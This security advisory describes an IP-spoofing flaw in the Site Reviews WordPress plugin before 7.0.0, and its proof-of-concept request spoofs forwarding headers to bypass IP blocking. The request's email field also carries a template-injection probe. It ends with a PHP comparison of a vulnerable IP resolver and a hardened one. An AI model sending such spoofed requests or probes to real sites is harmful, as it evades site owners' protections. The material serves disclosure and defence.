wpvulndb
Sławomir Zakrzewski, Maksymilian Kubiak (AFINE)
WPVDB-ID: 04C1581E-FD36-49D4-8463-B49915D4B1AC
History: May 08, 2024 - 12:00 a.m.

Site Reviews < 7.0.0 - IP Spoofing

2024-05-08 00:00:00
Sławomir Zakrzewski, Maksymilian Kubiak (AFINE)
wpscan.com
5
plugin
vulnerability
ip spoofing
headers
attacker
manipulate
bypass
blocking

AI Score

6.5

Confidence

High

EPSS

0

Percentile

9.0%

Description

The plugin retrieves the client IP address from potentially untrusted request headers, allowing an attacker to set its value to an arbitrary address. This may be used to bypass IP-based blocking.

PoC

Request sent to the server to add a review:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8888
Content-Length: 2196
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1Y1QjmoN1k9aBC7F
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: */*
Origin: http://localhost:8888
Referer: http://localhost:8888/wordpress/?page_id=594
Connection: close
X-Forwarded-For: 99.99.99.99
cf-connecting-ip: 99.99.99.99

------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[_action]"

submit-review
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[_nonce]"

d94cadf7b1
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[_post_id]"

594
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[_referer]"

------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[assigned_posts]"

------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[assigned_terms]"

------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[assigned_users]"

------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[excluded]"

------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[form_id]"

glsr_2160fffb
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[terms_exist]"

1
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[4e174f9d]"

------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[rating]"

5
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[title]"

test
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[content]"

test
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[name]"

test
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[email]"

szakrzewski+${55}${{66}}@afine.com
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="site-reviews[terms]"

1
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="action"

glsr_action
------WebKitFormBoundary1Y1QjmoN1k9aBC7F
Content-Disposition: form-data; name="_ajax_request"

true
------WebKitFormBoundary1Y1QjmoN1k9aBC7F--

Response:

HTTP/1.1 200 OK
Server: nginx/1.19.2
Date: Thu, 22 Feb 2024 14:03:45 GMT
Content-Type: application/json; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.33
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Referrer-Policy: strict-origin-when-cross-origin
X-Frame-Options: SAMEORIGIN
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Length: 1706

{"success":true,"data":{"errors":false,"html":"[rendered review markup; tags stripped by extraction, surviving text fragments: test / Rated 5,0 out of 5 / 2024-02-22 / test / test]","message":"Your review has been submitted!","redirect":"","review":{"assigned_posts":[],"assigned_terms":[],"assigned_users":[],"author":"test","author_id":0,"avatar":"https://secure.gravatar.com/avatar?d=mm&s=80","content":"test","custom":[],"date":"2024-02-22 15:03:45","date_gmt":"2024-02-22 14:03:45","email":"szakrzewski+${55}${{66}}@afine.com","ID":596,"ip_address":"99.99.99.99","is_approved":true,"is_modified":false,"is_pinned":false,"is_verified":false,"rating":5,"rating_id":19,"response":null,"score":0,"status":"publish","terms":true,"title":"test","type":"local","url":""},"reviews":""}}
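The response above stores the header-supplied 99.99.99.99 as the review's ip_address. The following PHP is an added example, not the plugin's code: a weak resolver that trusts forwarding headers from any peer, beside a hardened one that only honours X-Forwarded-For when REMOTE_ADDR is a known reverse proxy (the $trustedProxies list, the 10.0.0.5 proxy and the peer addresses are constructed for the example; cf-connecting-ip is deliberately ignored unless the proxy layer is known to set it).

```php
<?php
// Added example, not the plugin's code. Assumes the site sits behind the
// reverse proxies listed in $trustedProxies; every other peer is untrusted.

// Weak pattern: honours client-supplied headers unconditionally, so a direct
// request carrying "X-Forwarded-For: 99.99.99.99" is recorded as 99.99.99.99.
function client_ip_weak(array $server): string
{
    foreach (['HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR'] as $key) {
        if (!empty($server[$key])) {
            return trim(explode(',', $server[$key])[0]);
        }
    }
    return '0.0.0.0';
}

// Hardened: start from REMOTE_ADDR (the TCP peer, which the client cannot
// forge) and walk X-Forwarded-For right to left only while the current hop is
// a trusted proxy; the first untrusted hop is the real client.
function client_ip_hardened(array $server, array $trustedProxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0';
    }
    if (!in_array($remote, $trustedProxies, true)) {
        return $remote; // direct connection: forwarding headers are attacker-controlled
    }
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        if (filter_var($hops[$i], FILTER_VALIDATE_IP) === false) {
            break; // malformed entry: stop and fall back to the proxy address
        }
        if (!in_array($hops[$i], $trustedProxies, true)) {
            return $hops[$i];
        }
    }
    return $remote;
}

// Constructed inputs. $direct mirrors the PoC: no proxy, spoofed headers.
// $proxied is the same spoof sent through the trusted proxy 10.0.0.5, which
// appends the true peer 198.51.100.7 to X-Forwarded-For.
$trustedProxies = ['10.0.0.5'];
$direct  = ['REMOTE_ADDR' => '203.0.113.10', 'HTTP_X_FORWARDED_FOR' => '99.99.99.99',
            'HTTP_CF_CONNECTING_IP' => '99.99.99.99'];
$proxied = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => '99.99.99.99, 198.51.100.7'];
echo client_ip_weak($direct), ' | ', client_ip_hardened($direct, $trustedProxies), PHP_EOL;
echo client_ip_weak($proxied), ' | ', client_ip_hardened($proxied, $trustedProxies), PHP_EOL;
```

For both constructed requests the weak resolver reports the spoofed 99.99.99.99, while the hardened one reports the direct peer and the proxy-appended peer respectively, which is what an IP-based block list needs to act on.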
